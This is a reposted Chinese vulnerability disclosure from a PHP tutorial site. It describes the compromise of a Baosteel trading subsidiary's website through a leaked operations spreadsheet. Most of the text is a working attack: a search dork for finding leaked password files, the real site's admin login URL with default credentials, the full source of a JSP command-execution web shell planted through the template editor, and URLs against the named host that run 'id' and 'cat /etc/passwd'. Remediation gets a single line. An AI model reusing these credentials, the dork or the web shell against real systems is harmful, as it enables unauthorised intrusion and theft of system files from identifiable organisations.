网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

宝钢贸易公司某子站运维文档泄露导致getshell - 网站安全 - 自学php网

来源:未知    时间:2015-04-15 13:09 作者:xxadmin 阅读:

[导读] 宝钢贸易公司子站运维文档泄露,其中包括内网信息和多个子站后台地址、用户名密码。 其中www.nesteel.cn(沈阳宝钢东北贸易公司)可getshell google查询字符串:宝钢 filetype:xlsx intext:密码...

宝钢贸易公司子站运维文档泄露,其中包括内网信息和多个子站后台地址、用户名密码。

其中www.nesteel.cn(沈阳宝钢东北贸易公司)可getshell

bg1.PNG

google查询字符串:宝钢 filetype:xlsx intext:密码

bg.PNG



其中包含后台用户名、密码及多台内网主机管理信息。

后台:http://www.nesteel.cn/cms_wz/login.jsp

用户名:admin

密码:admin

进入后台后,使用模板编辑功能可添加jsp代码

bg3.PNG



添加代码

<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
                }
        }
%>



从而可使用站点预览功能执行命令(加cmd参数),可getshell

由于文档泄露了大量内网信息,估计可以造成更大破坏,因为没有时间,暂不测试。

站点预览功能url

view-source:http://www.nesteel.cn/cms_wz/DispatchAction.do?efFormEname=ECTM40&key=AWIAPwFqUzICY1dgB2AMbQNnAmEGYgM0UGMFNQJmUGIBEgxDXUZVd1ZHAUZfSFc2&passPermit=true&cmd=id

 

bg4.PNG



view-source:http://www.nesteel.cn/cms_wz/DispatchAction.do?efFormEname=ECTM40&key=AWIAPwFqUzICY1dgB2AMbQNnAmEGYgM0UGMFNQJmUGIBEgxDXUZVd1ZHAUZfSFc2&passPermit=true&cmd=cat /etc/passwd
 

bg6.PNG

 

解决方案:

停止文件分享,将后台口令修改为强口令。

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论